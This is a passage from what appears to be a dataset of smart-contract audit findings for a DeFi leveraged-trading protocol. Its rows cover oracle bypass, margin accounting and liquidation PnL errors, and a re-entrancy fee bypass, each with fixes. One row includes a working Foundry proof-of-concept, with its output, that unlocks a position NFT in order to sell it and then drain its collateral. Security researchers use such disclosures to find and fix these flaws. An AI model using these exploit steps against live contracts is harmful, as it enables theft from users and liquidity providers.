check will not guard against this attack effectively. For instance, in the above example, if the Chainlink price is $975 and the `maxDiffPercent` is 5%, the Pyth price of $950 or $1000 still falls within the acceptable range. If the `maxDiffPercent` is reduced to a smaller margin, it will potentially lead to a more serious issue where all the transactions get reverted when fetching the price, breaking the entire protocol.","Ensure that the keepers must update the Pyth price when executing an order. Perform additional checks against the `priceUpdateData` submitted by the keepers to ensure that it is not empty and `priceId` within the `PriceInfo` matches the price ID of the collateral (rETH), so as to prevent malicious keeper from bypassing the price update by passing in an empty array or price update data that is not mapped to the collateral (rETH).",Loss of assets as shown in the scenario above.,"```\\nFile: DelayedOrder.sol\\n function executeOrder(\\n address account,\\n bytes[] calldata priceUpdateData\\n )\\n external\\n payable\\n nonReentrant\\n whenNotPaused\\n updatePythPrice(vault, msg.sender, priceUpdateData)\\n orderInvariantChecks(vault)\\n {\\n // Settle funding fees before executing any order.\\n // This is to avoid error related to max caps or max skew reached when the market has been skewed to one side for a long time.\\n // This is more important in case the we allow for limit orders in the future.\\n vault.settleFundingFees();\\n..SNIP..\\n }\\n```\\n" +Losses of some long traders can eat into the margins of others,medium,"The losses of some long traders can eat into the margins of others, resulting in those affected long traders being unable to withdraw their margin and profits, leading to a loss of assets for the long traders.\\nAt $T0$, the current price of ETH is $1000 and assume the following state:\\nAlice's Long Position 1 Bob's Long Position 2 Charles (LP)\\nPosition Size = 6 ETH\\nMargin = 3 ETH\\nLast Price (entry price) = $1000 Position Size = 6 ETH\\nMargin = 5 ETH\\nLast Price (entry price) = $1000 Deposited 12 ETH\\nThe `stableCollateralTotal` will be 12 ETH\\nThe `GlobalPositions.marginDepositedTotal` will be 8 ETH (3 + 5)\\nThe `globalPosition.sizeOpenedTotal` will be 12 ETH (6 + 6)\\nThe total balance of ETH in the vault is 20 ETH.\\nAs this is a perfectly hedged market, the accrued fee will be zero, and ignored in this report for simplicity's sake.\\nAt $T1$, the price of the ETH drops from $1000 to $600. At this point, the settle margin of both long positions will be as follows:\\nAlice's Long Position 1 Bob's Long Position 2\\npriceShift = Current Price - Last Price = $600 - $1000 = -$400\\nPnL = (Position Size * priceShift) / Current Price = (6 ETH * -$400) / $400 = -4 ETH\\nsettleMargin = marginDeposited + PnL = 3 ETH + (-4 ETH) = -1 ETH PnL = -4 ETH (Same calculation)\\nsettleMargin = marginDeposited + PnL = 5 ETH + (-4 ETH) = 1 ETH\\nAlice's long position is underwater (settleMargin < 0), so it can be liquidated. When the liquidation is triggered, it will internally call the `updateGlobalPositionData` function. Even if the liquidation does not occur, any of the following actions will also trigger the `updateGlobalPositionData` function internally:\\nexecuteOpen\\nexecuteAdjust\\nexecuteClose\\nThe purpose of the `updateGlobalPositionData` function is to update the global position data. This includes getting the total profit loss of all long traders (Alice & Bob), and updating the margin deposited total + stable collateral total accordingly.\\nAssume that the `updateGlobalPositionData` function is triggered by one of the above-mentioned functions. Line 179 below will compute the total PnL of all the opened long positions.\\n```\\npriceShift = current price - last price\\npriceShift = $600 - $1000 = -$400\\n\\nprofitLossTotal = (globalPosition.sizeOpenedTotal * priceShift) / current price\\nprofitLossTotal = (12 ETH * -$400) / $600\\nprofitLossTotal = -8 ETH\\n```\\n\\nThe `profitLossTotal` is -8 ETH. This is aligned with what we have calculated earlier, where Alice's PnL is -4 ETH and Bob's PnL is -4 ETH (total = -8 ETH loss).\\nAt Line 184 below, the `newMarginDepositedTotal` will be set to as follows (ignoring the `_marginDelta` for simplicity's sake)\\n```\\nnewMarginDepositedTotal = _globalPositions.marginDepositedTotal + _marginDelta + profitLossTotal\\nnewMarginDepositedTotal = 8 ETH + 0 + (-8 ETH) = 0 ETH\\n```\\n\\nWhat happened above is that 8 ETH collateral is deducted from the long traders and transferred to LP. When `newMarginDepositedTotal` is zero, this means that the long trader no longer owns any collateral. This is incorrect, as Bob's position should still contribute 1 ETH remaining margin to the long trader's pool.\\nLet's review Alice's Long Position 1: Her position's settled margin is -1 ETH. When the settled margin is -ve then the LPs have to bear the cost of loss per the comment here. However, in this case, we can see that it is Bob (long trader) instead of LPs who are bearing the cost of Alice's loss, which is incorrect.\\nLet's review Bob's Long Position 2: His position's settled margin is 1 ETH. If his position's liquidation margin is $LM$, Bob should be able to withdraw $1\\ ETH - LM$ of his position's margin. However, in this case, the `marginDepositedTotal` is already zero, so there is no more collateral left on the long trader pool for Bob to withdraw, which is incorrect.\\nWith the current implementation, the losses of some long traders can eat into the margins of others, resulting in those affected long traders being unable to withdraw their margin and profits.\\n```\\nbeing File: FlatcoinVault.sol\\n function updateGlobalPositionData(\\n uint256 _price,\\n int256 _marginDelta,\\n int256 _additionalSizeDelta\\n ) external onlyAuthorizedModule {\\n // Get the total profit loss and update the margin deposited total.\\n int256 profitLossTotal = PerpMath._profitLossTotal({globalPosition: _globalPositions, price: _price});\\n\\n // Note that technically, even the funding fees should be accounted for when computing the margin deposited total.\\n // However, since the funding fees are settled at the same time as the global position data is updated,\\n // we can ignore the funding fees here.\\n int256 newMarginDepositedTotal = int256(_globalPositions.marginDepositedTotal) + _marginDelta + profitLossTotal;\\n\\n // Check that the sum of margin of all the leverage traders is not negative.\\n // Rounding errors shouldn't result in a negative margin deposited total given that\\n // we are rounding down the profit loss of the position.\\n // If anything, after closing the last position in the system, the `marginDepositedTotal` should can be positive.\\n // The margin may be negative if liquidations are not happening in a timely manner.\\n if (newMarginDepositedTotal < 0) {\\n revert FlatcoinErrors.InsufficientGlobalMargin();\\n }\\n\\n _globalPositions = FlatcoinStructs.GlobalPositions({\\n marginDepositedTotal: uint256(newMarginDepositedTotal),\\n sizeOpenedTotal: (int256(_globalPositions.sizeOpenedTotal) + _additionalSizeDelta).toUint256(),\\n lastPrice: _price\\n });\\n\\n // Profit loss of leverage traders has to be accounted for by adjusting the stable collateral total.\\n // Note that technically, even the funding fees should be accounted for when computing the stable collateral total.\\n // However, since the funding fees are settled at the same time as the global position data is updated,\\n // we can ignore the funding fees here\\n _updateStableCollateralTotal(-profitLossTotal);\\n }\\n```\\n","The following are the two issues identified earlier and the recommended fixes:\\nIssue 1\\nLet's review Alice's Long Position 1: Her position's settled margin is -1 ETH. When the settled margin is -ve then the LPs have to bear the cost of loss per the comment here. However, in this case, we can see that it is Bob (long trader) instead of LPs who are bearing the cost of Alice's loss, which is incorrect.\\nFix: Alice -1 ETH loss should be borne by the LP, not the long traders. The stable collateral total of LP should be deducted by 1 ETH to bear the cost of the loss.\\nIssue 2\\nLet's review Bob's Long Position 2: His position's settled margin is 1 ETH. If his position's liquidation margin is $LM$, Bob should be able to withdraw $1\\ ETH - LM$ of his position's margin. However, in this case, the `marginDepositedTotal` is already zero, so there is no more collateral left on the long trader pool for Bob to withdraw, which is incorrect.\\nFix: Bob should be able to withdraw $1\\ ETH - LM$ of his position's margin regardless of the PnL of other long traders. Bob's margin should be isolated from Alice's loss.","Loss of assets for the long traders as the losses of some long traders can eat into the margins of others, resulting in those affected long traders being unable to withdraw their margin and profits.",```\\npriceShift = current price - last price\\npriceShift = $600 - $1000 = -$400\\n\\nprofitLossTotal = (globalPosition.sizeOpenedTotal * priceShift) / current price\\nprofitLossTotal = (12 ETH * -$400) / $600\\nprofitLossTotal = -8 ETH\\n```\\n +The transfer lock for leveraged position orders can be bypassed,high,"The leveraged positions can be closed either through `DelayedOrder` or through the `LimitOrder`. Once the order is announced via `DelayedOrder.announceLeverageClose` or `LimitOrder.announceLimitOrder` function the LeverageModule's `lock` function is called to prevent given token to be transferred. This mechanism can be bypassed and it is possible to unlock the token transfer while having order announced.\\nExploitation scenario:\\nAttacker announces leverage close order for his position via `announceLeverageClose` of `DelayedOrder` contract.\\nAttacker announces limit order via `announceLimitOrder` of `LimitOrder` contract.\\nAttacker cancels limit order via `cancelLimitOrder` of `LimitOrder` contract.\\nThe position is getting unlocked while the leverage close announcement is active.\\nAttacker sells the leveraged position to a third party.\\nAttacker executes the leverage close via `executeOrder` of `DelayedOrder` contract and gets the underlying collateral stealing the funds from the third party that the leveraged position was sold to.\\nFollowing proof of concept presents the attack:\\n```\\nfunction testExploitTransferOut() public {\\n uint256 collateralPrice = 1000e8;\\n\\n vm.startPrank(alice);\\n\\n uint256 balance = WETH.balanceOf(alice);\\n console2.log(""alice balance"", balance);\\n \\n (uint256 minFillPrice, ) = oracleModProxy.getPrice();\\n\\n // Announce order through delayed orders to lock tokenId\\n delayedOrderProxy.announceLeverageClose(\\n tokenId,\\n minFillPrice - 100, // add some slippage\\n mockKeeperFee.getKeeperFee()\\n );\\n \\n // Announce limit order to lock tokenId\\n limitOrderProxy.announceLimitOrder({\\n tokenId: tokenId,\\n priceLowerThreshold: 900e18,\\n priceUpperThreshold: 1100e18\\n });\\n \\n // Cancel limit order to unlock tokenId\\n limitOrderProxy.cancelLimitOrder(tokenId);\\n \\n balance = WETH.balanceOf(alice);\\n console2.log(""alice after creating two orders"", balance);\\n\\n // TokenId is unlocked and can be transferred while the delayed order is active\\n leverageModProxy.transferFrom(alice, address(0x1), tokenId);\\n console2.log(""new owner of position NFT"", leverageModProxy.ownerOf(tokenId));\\n\\n balance = WETH.balanceOf(alice);\\n console2.log(""alice after transfering position NFT out e.g. selling"", balance);\\n\\n skip(uint256(vaultProxy.minExecutabilityAge())); // must reach minimum executability time\\n\\n uint256 oraclePrice = collateralPrice;\\n\\n bytes[] memory priceUpdateData = getPriceUpdateData(oraclePrice);\\n delayedOrderProxy.executeOrder{value: 1}(alice, priceUpdateData);\\n\\n uint256 finalBalance = WETH.balanceOf(alice);\\n console2.log(""alice after executing delayerd order and cashing out profit"", finalBalance);\\n console2.log(""profit"", finalBalance - balance);\\n}\\n```\\n\\nOutput\\n```\\nRunning 1 test for test/unit/Common/LimitOrder.t.sol:LimitOrderTest\\n[PASS] testExploitTransferOut() (gas: 743262)\\nLogs:\\n alice balance 99879997000000000000000\\n alice after creating two orders 99879997000000000000000\\n new owner of position NFT 0x0000000000000000000000000000000000000001\\n alice after transfering position NFT out e.g. selling 99879997000000000000000\\n alice after executing delayerd order and cashing out profit 99889997000000000000000\\n profit 10000000000000000000\\n\\nTest result: ok. 1 passed; 0 failed; 0 skipped; finished in 50.06ms\\n\\nRan 1 test suites: 1 tests passed, 0 failed, 0 skipped (1 total tests)\\n```\\n",It is recommended to prevent announcing order either through `DelayedOrder.announceLeverageClose` or `LimitOrder.announceLimitOrder` if the leveraged position is already locked.,"The attacker can sell the leveraged position with a close order opened, execute the order afterward, and steal the underlying collateral.","```\\nfunction testExploitTransferOut() public {\\n uint256 collateralPrice = 1000e8;\\n\\n vm.startPrank(alice);\\n\\n uint256 balance = WETH.balanceOf(alice);\\n console2.log(""alice balance"", balance);\\n \\n (uint256 minFillPrice, ) = oracleModProxy.getPrice();\\n\\n // Announce order through delayed orders to lock tokenId\\n delayedOrderProxy.announceLeverageClose(\\n tokenId,\\n minFillPrice - 100, // add some slippage\\n mockKeeperFee.getKeeperFee()\\n );\\n \\n // Announce limit order to lock tokenId\\n limitOrderProxy.announceLimitOrder({\\n tokenId: tokenId,\\n priceLowerThreshold: 900e18,\\n priceUpperThreshold: 1100e18\\n });\\n \\n // Cancel limit order to unlock tokenId\\n limitOrderProxy.cancelLimitOrder(tokenId);\\n \\n balance = WETH.balanceOf(alice);\\n console2.log(""alice after creating two orders"", balance);\\n\\n // TokenId is unlocked and can be transferred while the delayed order is active\\n leverageModProxy.transferFrom(alice, address(0x1), tokenId);\\n console2.log(""new owner of position NFT"", leverageModProxy.ownerOf(tokenId));\\n\\n balance = WETH.balanceOf(alice);\\n console2.log(""alice after transfering position NFT out e.g. selling"", balance);\\n\\n skip(uint256(vaultProxy.minExecutabilityAge())); // must reach minimum executability time\\n\\n uint256 oraclePrice = collateralPrice;\\n\\n bytes[] memory priceUpdateData = getPriceUpdateData(oraclePrice);\\n delayedOrderProxy.executeOrder{value: 1}(alice, priceUpdateData);\\n\\n uint256 finalBalance = WETH.balanceOf(alice);\\n console2.log(""alice after executing delayerd order and cashing out profit"", finalBalance);\\n console2.log(""profit"", finalBalance - balance);\\n}\\n```\\n" +A malicious user can bypass limit order trading fees via cross-function re-entrancy,high,"A malicious user can bypass limit order trading fees via cross-function re-entrancy, since `_safeMint` makes an external call to the user before updating state.\\nIn the `LeverageModule` contract, the `_mint` function calls `_safeMint`, which makes an external call `to` the receiver of the NFT (the `to` address).\\n\\nOnly after this external call, `vault.setPosition()` is called to create the new position in the vault's storage mapping. This means that an attacker can gain control of the execution while the state of `_positions[_tokenId]` in FlatcoinVault is not up-to-date.\\n\\nThis outdated state of `_positions[_tokenId]` can be exploited by an attacker once the external call has been made. They can re-enter `LimitOrder::announceLimitOrder()` and provide the tokenId that has just been minted. In that function, the trading fee is calculated as follows:\\n```\\nuint256 tradeFee = ILeverageModule(vault.moduleAddress(FlatcoinModuleKeys._LEVERAGE_MODULE_KEY)).getTradeFee(\\n vault.getPosition(tokenId).additionalSize\\n);\\n```\\n\\nHowever since the position has not been created yet (due to state being updated after an external call), this results in the `tradeFee` being 0 since `vault.getPosition(tokenId).additionalSize` returns the default value of a uint256 (0), and `tradeFee` = fee * size.\\nHence, when the limit order is executed, the trading fee (tradeFee) charged to the user will be `0`.\\nA user announces opening a leverage position, calling announceLeverageOpen() via a smart contract which implements `IERC721Receiver`.\\nOnce the keeper executes the order, the contract is called, with the function `onERC721Received(address,address,uint256,bytes)`\\nThe function calls `LimitOrder::announceLimitOrder()` to create the desired limit order to close the position. (stop loss, take profit levels)\\nThe contract then returns `msg.sig` (the function signature of the executing function) to satify the IERC721Receiver's requirement.\\nTo run this proof of concept:\\nAdd 2 files `AttackerContract.sol` and `ReentrancyPoC.t.sol` to `flatcoin-v1/test/unit` in the project's repo.\\nrun `forge test --mt test_tradingFeeBypass -vv` in the terminal\\n\\n\\n","To fix this specific issue, the following change is sufficient:\\n```\\n// Remove the line below\\n_newTokenId = _mint(_account); \\n\\nvault.setPosition( \\n FlatcoinStructs.Position({\\n lastPrice: entryPrice,\\n marginDeposited: announcedOpen.margin,\\n additionalSize: announcedOpen.additionalSize,\\n entryCumulativeFunding: vault.cumulativeFundingRate()\\n }),\\n// Remove the line below\\n _newTokenId\\n// Add the line below\\n tokenIdNext\\n);\\n// Add the line below\\n_newTokenId = _mint(_account); \\n```\\n\\nHowever there are still more state changes that would occur after the `_mint` function (potentially yielding other cross-function re-entrancy if the other contracts were changed) so the optimum solution would be to mint the NFT after all state changes have been executed, so the safest solution would be to move `_mint` all the way to the end of `LeverageModule::executeOpen()`.\\nOtherwise, if changing this order of operations is undesirable for whatever reason, one can implement the following check within `LimitOrder::announceLimitOrder()` to ensure that the `positions[_tokenId]` is not uninitialized:\\n```\\nuint256 tradeFee = ILeverageModule(vault.moduleAddress(FlatcoinModuleKeys._LEVERAGE_MODULE_KEY)).getTradeFee(\\n vault.getPosition(tokenId).additionalSize\\n);\\n\\n// Add the line below\\nrequire(additionalSize > 0, ""Additional Size of a position cannot be zero"");\\n```\\n","A malicious user can bypass the trading fees for a limit order, via cross-function re-entrancy. These trading fees were supposed to be paid to the LPs by increasing `stableCollateralTotal`, but due to limit orders being able to bypass trading fees (albeit during the same transaction as opening the position), LPs are now less incentivised to provide their liquidity to the protocol.",```\\nuint256 tradeFee = ILeverageModule(vault.moduleAddress(FlatcoinModuleKeys._LEVERAGE_MODULE_KEY)).getTradeFee(\\n vault.getPosition(tokenId).additionalSize\\n);\\n```\\n +Incorrect handling of PnL during liquidation,high,"The incorrect handling of PnL during liquidation led to an error in the protocol's accounting mechanism, which might result in various issues, such as the loss of assets and the stable collateral total being inflated.\\nFirst Example\\nAssume a long position with the following state:\\nMargin Deposited = +20\\nAccrued Funding = -100\\nProfit & Loss (PnL) = +100\\nLiquidation Margin = 30\\nLiquidation Fee = 25\\nSettled Margin = Margin Deposited + Accrued Funding + PnL = 20\\nLet the current `StableCollateralTotal` be $x$ and `marginDepositedTotal` be $y$ at the start of the liquidation.\\nFirstly, the `settleFundingFees()` function will be executed at the start of the liquidation process. The effect of the `settleFundingFees()` function is shown below. The long trader's `marginDepositedTotal` will be reduced by 100, while the LP's `stableCollateralTotal` will increase by 100.\\n```\\nsettleFundingFees() = Short/LP need to pay Long 100\\n\\nmarginDepositedTotal = marginDepositedTotal + funding fee\\nmarginDepositedTotal = y + (-100) = (y - 100)\\n\\nstableCollateralTotal = x + (-(-100)) = (x + 100)\\n```\\n\\nSince the position's settle margin is below the liquidation margin, the position will be liquidated.\\nAt Line 109, the condition `(settledMargin > 0)` will be evaluated as `True`. At Line 123:\\n```\\nif (uint256(settledMargin) > expectedLiquidationFee)\\nif (+20 > +25) => False\\nliquidatorFee = settledMargin\\nliquidatorFee = +20\\n```\\n\\nThe `liquidationFee` will be to +20 at Line 127 below. This basically means that all the remaining margin of 20 will be given to the liquidator, and there should be no remaining margin for the LPs.\\nAt Line 133 below, the `vault.updateStableCollateralTotal` function will be executed:\\n```\\nvault.updateStableCollateralTotal(remainingMargin - positionSummary.profitLoss);\\nvault.updateStableCollateralTotal(0 - (+100));\\nvault.updateStableCollateralTotal(-100);\\n\\nstableCollateralTotal = (x + 100) - 100 = x\\n```\\n\\nWhen `vault.updateStableCollateralTotal` is set to `-100`, `stableCollateralTotal` is equal to $x$.\\n```\\nFile: LiquidationModule.sol\\n function liquidate(uint256 tokenId) public nonReentrant whenNotPaused liquidationInvariantChecks(vault, tokenId) {\\n..SNIP..\\n // Check that the total margin deposited by the long traders is not -ve.\\n // To get this amount, we will have to account for the PnL and funding fees accrued.\\n int256 settledMargin = positionSummary.marginAfterSettlement;\\n\\n uint256 liquidatorFee;\\n\\n // If the settled margin is greater than 0, send a portion (or all) of the margin to the liquidator and LPs.\\n if (settledMargin > 0) {\\n // Calculate the liquidation fees to be sent to the caller.\\n uint256 expectedLiquidationFee = PerpMath._liquidationFee(\\n position.additionalSize,\\n liquidationFeeRatio,\\n liquidationFeeLowerBound,\\n liquidationFeeUpperBound,\\n currentPrice\\n );\\n\\n uint256 remainingMargin;\\n\\n // Calculate the remaining margin after accounting for liquidation fees.\\n // If the settled margin is less than the liquidation fee, then the liquidator fee is the settled margin.\\n if (uint256(settledMargin) > expectedLiquidationFee) {\\n liquidatorFee = expectedLiquidationFee;\\n remainingMargin = uint256(settledMargin) - expectedLiquidationFee;\\n } else {\\n liquidatorFee = uint256(settledMargin);\\n }\\n\\n // Adjust the stable collateral total to account for user's remaining margin.\\n // If the remaining margin is greater than 0, this goes to the LPs.\\n // Note that {`remainingMargin` - `profitLoss`} is the same as {`marginDeposited` + `accruedFunding`}.\\n vault.updateStableCollateralTotal(int256(remainingMargin) - positionSummary.profitLoss);\\n\\n // Send the liquidator fee to the caller of the function.\\n // If the liquidation fee is greater than the remaining margin, then send the remaining margin.\\n vault.sendCollateral(msg.sender, liquidatorFee);\\n } else {\\n // If the settled margin is -ve then the LPs have to bear the cost.\\n // Adjust the stable collateral total to account for user's profit/loss and the negative margin.\\n // Note: We are adding `settledMargin` and `profitLoss` instead of subtracting because of their sign (which will be -ve).\\n vault.updateStableCollateralTotal(settledMargin - positionSummary.profitLoss);\\n }\\n```\\n\\nNext, the `vault.updateGlobalPositionData` function here will be executed.\\n```\\nvault.updateGlobalPositionData({marginDelta: -(position.marginDeposited + positionSummary.accruedFunding)})\\nvault.updateGlobalPositionData({marginDelta: -(20 + (-100))})\\nvault.updateGlobalPositionData({marginDelta: 80})\\n\\nprofitLossTotal = 100\\nnewMarginDepositedTotal = globalPositions.marginDepositedTotal + marginDelta + profitLossTotal\\nnewMarginDepositedTotal = (y - 100) + 80 + 100 = (y + 80)\\n\\nstableCollateralTotal = stableCollateralTotal + -PnL\\nstableCollateralTotal = x + (-100) = (x - 100)\\n```\\n\\nThe final `newMarginDepositedTotal` is $y + 80$ and `stableCollateralTotal` is $x -100$, which is incorrect. In this scenario\\nThere is no remaining margin for the LPs, as all the remaining margin has been sent to the liquidator as a fee. The remaining margin (settled margin) is also not negative. Thus, there should not be any loss on the `stableCollateralTotal`. The correct final `stableCollateralTotal` should be $x$.\\nThe final `newMarginDepositedTotal` is $y + 80$, which is incorrect as this indicates that the long trader's pool has gained 80 ETH, which should not be the case when a long position is being liquidated.\\nSecond Example\\nThe current price of rETH is $1000.\\nLet's say there is a user A (Alice) who makes a deposit of 5 rETH as collateral for LP.\\nLet's say another user, Bob (B), comes up, deposits 2 rETH as a margin, and creates a position with a size of 5 rETH, basically creating a perfectly hedged market. Since this is a perfectly hedged market, the accrued funding fee will be zero for the context of this example.\\nTotal collateral in the system = 5 rETH + 2 rETH = 7 rETH\\nAfter some time, the price of rETH drop to $500. As a result, Bob's position is liquidated as its settled margin is less than zero.\\n$$ settleMargin = 2\\ rETH + \\frac{5 \\times (500 - 1000)}{500} = 2\\ rETH - 5\\ rETH = -3\\ rETH $$\\nDuring the liquidation, the following code is executed to update the LP's stable collateral total:\\n```\\nvault.updateStableCollateralTotal(settledMargin - positionSummary.profitLoss);\\nvault.updateStableCollateralTotal(-3 rETH - (-5 rETH));\\nvault.updateStableCollateralTotal(+2);\\n```\\n\\nLP's stable collateral total increased by 2 rETH.\\nSubsequently, the `updateGlobalPositionData` function will be executed.\\n```\\nFile: LiquidationModule.sol\\n function liquidate(uint256 tokenId) public nonReentrant whenNotPaused liquidationInvariantChecks(vault, tokenId) {\\n..SNIP..\\n vault.updateGlobalPositionData({\\n price: position.lastPrice,\\n marginDelta: -(int256(position.marginDeposited) + positionSummary.accruedFunding),\\n additionalSizeDelta: -int256(position.additionalSize) // Since position is being closed, additionalSizeDelta should be negative.\\n });\\n```\\n\\nWithin the `updateGlobalPositionData` function, the `profitLossTotal` at Line 179 will be -5 rETH. This means that the long trader (Bob) has lost 5 rETH.\\nAt Line 205 below, the PnL of the long traders (-5 rETH) will be transferred to the LP's stable collateral total. In this case, the LPs gain 5 rETH.\\nNote that the LP's stable collateral total has been increased by 2 rETH earlier and now we are increasing it by 5 rETH again. Thus, the total gain by LPs is 7 rETH. If we add 7 rETH to the original stable collateral total, it will be 7 rETH + 5 rETH = 12 rETH. However, this is incorrect because we only have 7 rETH collateral within the system, as shown at the start.\\n```\\nFile: FlatcoinVault.sol\\n function updateGlobalPositionData(\\n uint256 _price,\\n int256 _marginDelta,\\n int256 _additionalSizeDelta\\n ) external onlyAuthorizedModule {\\n // Get the total profit loss and update the margin deposited total.\\n int256 profitLossTotal = PerpMath._profitLossTotal({globalPosition: _globalPositions, price: _price});\\n\\n // Note that technically, even the funding fees should be accounted for when computing the margin deposited total.\\n // However, since the funding fees are settled at the same time as the global position data is updated,\\n // we can ignore the funding fees here.\\n int256 newMarginDepositedTotal = int256(_globalPositions.marginDepositedTotal) + _marginDelta + profitLossTotal;\\n\\n // Check that the sum of margin of all the leverage traders is not negative.\\n // Rounding errors shouldn't result in a negative margin deposited total given that\\n // we are rounding down the profit loss of the position.\\n // If anything, after closing the last position in the system, the `marginDepositedTotal` should can be positive.\\n // The margin may be negative if liquidations are not happening in a timely manner.\\n if (newMarginDepositedTotal < 0) {\\n revert FlatcoinErrors.InsufficientGlobalMargin();\\n }\\n\\n _globalPositions = FlatcoinStructs.GlobalPositions({\\n marginDepositedTotal: uint256(newMarginDepositedTotal),\\n sizeOpenedTotal: (int256(_globalPositions.sizeOpenedTotal) + _additionalSizeDelta).toUint256(),\\n lastPrice: _price\\n });\\n\\n // Profit loss of leverage traders has to be accounted for by adjusting the stable collateral total.\\n // Note that technically, even the funding fees should be accounted for when computing the stable collateral total.\\n // However, since the funding fees are settled at the same time as the global position data is updated,\\n // we can ignore the funding fees here\\n _updateStableCollateralTotal(-profitLossTotal);\\n }\\n```\\n\\nThird Example\\nAt $T0$, the marginDepositedTotal = 70 ETH, stableCollateralTotal = 100 ETH, vault's balance = 170 ETH\\nBob's Long Position Alice (LP)\\nMargin = 70 ETH\\nPosition Size = 500 ETH\\nLeverage = (500 + 20) / 20 = 26x\\nLiquidation Fee = 50 ETH\\nLiquidation Margin = 60 ETH\\nEntry Price = $1000 per ETH Deposited = 100 ETH\\nAt $T1$, the position's settled margin falls to 60 ETH (margin = +70, accrued fee = -5, PnL = -5) and is subjected to liquidation.\\nFirstly, the `settleFundingFees()` function will be executed at the start of the liquidation process. The effect of the `settleFundingFees()` function is shown below. The long trader's `marginDepositedTotal` will be reduced by 5, while the LP's `stableCollateralTotal` will increase by 5.\\n```\\nsettleFundingFees() = Long need to pay short 5\\n\\nmarginDepositedTotal = marginDepositedTotal + funding fee\\nmarginDepositedTotal = 70 + (-5) = 65\\n\\nstableCollateralTotal = 100 + (-(-5)) = 105\\n```\\n\\nNext, this part of the code will be executed to send a portion of the liquidated position's margin to the liquidator and LPs.\\n```\\nsettledMargin > 0 => True\\n(settledMargin > expectedLiquidationFee) => (+60 > +50) => True\\nremainingMargin = uint256(settledMargin) - expectedLiquidationFee = 60 - 50 = 10\\n```\\n\\n50 ETH will be sent to the liquidator and the remaining 10 ETH should goes to the LPs.\\n```\\nvault.updateStableCollateralTotal(remainingMargin - positionSummary.profitLoss) =>\\nstableCollateralTotal = 105 ETH + (remaining margin - PnL)\\nstableCollateralTotal = 105 ETH + (10 ETH - (-5 ETH))\\nstableCollateralTotal = 105 ETH + (15 ETH) = 120 ETH\\n```\\n\\nNext, the `vault.updateGlobalPositionData` function here will be executed.\\n```\\nvault.updateGlobalPositionData({marginDelta: -(position.marginDeposited + positionSummary.accruedFunding)})\\nvault.updateGlobalPositionData({marginDelta: -(70 + (-5))})\\nvault.updateGlobalPositionData({marginDelta: -65})\\n\\nprofitLossTotal = -5\\nnewMarginDepositedTotal = globalPositions.marginDepositedTotal + marginDelta + profitLossTotal\\nnewMarginDepositedTotal = 70 + (-65) + (-5) = 0\\n\\nstableCollateralTotal = stableCollateralTotal + -PnL\\nstableCollateralTotal = 120 + (-(5)) = 125\\n```\\n\\nThe reason why the profitLossTotal = -5 is because there is only one (1) position in the system. So, this loss actually comes from the loss of Bob's position.\\nThe `newMarginDepositedTotal = 0` is correct. This is because the system only has 1 position, which is Bob's position; once the position is liquidated, there should be no margin deposited left in the system.\\nHowever, `stableCollateralTotal = 125` is incorrect. Because the vault's collateral balance now is 170 - 50 (send to liquidator) = 120. Thus, the tracked balance and actual collateral balance are not in sync.","To remediate the issue, the `profitLossTotal` should be excluded within the `updateGlobalPositionData` function during liquidation.\\n```\\n// Remove the line below\\n profitLossTotal = PerpMath._profitLossTotal(// rest of code)\\n\\n// Remove the line below\\n newMarginDepositedTotal = globalPositions.marginDepositedTotal // Add the line below\\n _marginDelta // Add the line below\\n profitLossTotal\\n// Add the line below\\n newMarginDepositedTotal = globalPositions.marginDepositedTotal // Add the line below\\n _marginDelta\\n\\nif (newMarginDepositedTotal < 0) {\\n revert FlatcoinErrors.InsufficientGlobalMargin();\\n}\\n\\n_globalPositions = FlatcoinStructs.GlobalPositions({\\n marginDepositedTotal: uint256(newMarginDepositedTotal),\\n sizeOpenedTotal: (int256(_globalPositions.sizeOpenedTotal) // Add the line below\\n _additionalSizeDelta).toUint256(),\\n lastPrice: _price\\n});\\n \\n// Remove the line below\\n _updateStableCollateralTotal(// Remove the line below\\nprofitLossTotal);\\n```\\n\\nThe existing `updateGlobalPositionData` function still needs to be used for other functions besides liquidation. As such, consider creating a separate new function (e.g., updateGlobalPositionDataDuringLiquidation) solely for use during the liquidation that includes the above fixes.\\nThe following attempts to apply the above fix to the three (3) examples described in the report to verify that it is working as intended.\\nFirst Example\\nLet the current `StableCollateralTotal` be $x$ and `marginDepositedTotal` be $y$ at the start of the liquidation.\\nDuring funding settlement:\\nStableCollateralTotal = $x$ + 100\\nmarginDepositedTotal = $y$ - 100\\nDuring updateStableCollateralTotal:\\n```\\nvault.updateStableCollateralTotal(int256(remainingMargin) - positionSummary.profitLoss);\\nvault.updateStableCollateralTotal(0 - (+100));\\nvault.updateStableCollateralTotal(-100);\\n```\\n\\nStableCollateralTotal = ($x$ + 100) - 100 = $x$\\nDuring Global Position Update:\\nmarginDelta = -(position.marginDeposited + positionSummary.accruedFunding) = -(20 + (-100)) = 80\\nnewMarginDepositedTotal = marginDepositedTotal + marginDelta = ($y$ - 100) + 80 = ($y$ - 20)\\nNo change to StableCollateralTotal here. Remain at $x$\\nConclusion:\\nThe LPs should not gain or lose in this scenario. Thus, the fact that the StableCollateralTotal remains as $x$ before and after the liquidation is correct.\\nThe `marginDepositedTotal` is ($y$ - 20) is correct because the liquidated position's remaining margin is 20 ETH. Thus, when this position is liquidated, 20 ETH should be deducted from the `marginDepositedTotal`\\nNo revert during the execution.\\nSecond Example\\nDuring updateStableCollateralTotal:\\n```\\nvault.updateStableCollateralTotal(settledMargin - positionSummary.profitLoss);\\nvault.updateStableCollateralTotal(-3 rETH - (-5 rETH));\\nvault.updateStableCollateralTotal(+2);\\n```\\n\\nStableCollateralTotal = 5 + 2 = 7 ETH\\nDuring Global Position Update:\\nmarginDelta = -(position.marginDeposited + positionSummary.accruedFunding) = -(2 + 0) = -2\\nmarginDepositedTotal = marginDepositedTotal + marginDelta = 2 + (-2) = 0\\nConclusion:\\nStableCollateralTotal = 7 ETH, marginDepositedTotal = 0 (Total 7 ETH tracked in the system)\\nBalance of collateral in the system = 7 ETH. Thus, both values are in sync. No revert.\\nThird Example\\nDuring funding settlement (Transfer 5 from Long to LP):\\nmarginDepositedTotal = 70 + (-5) = 65\\nStableCollateralTotal = 100 + 5 = 105\\nTransfer fee to Liquidator\\n50 ETH sent to the liquidator from the system: Balance of collateral in the system = 170 ETH - 50 ETH = 120 ETH\\nDuring updateStableCollateralTotal:\\n```\\nvault.updateStableCollateralTotal(remainingMargin - positionSummary.profitLoss) =>\\nstableCollateralTotal = 105 ETH + (remaining margin - PnL)\\nstableCollateralTotal = 105 ETH + (10 ETH - (-5 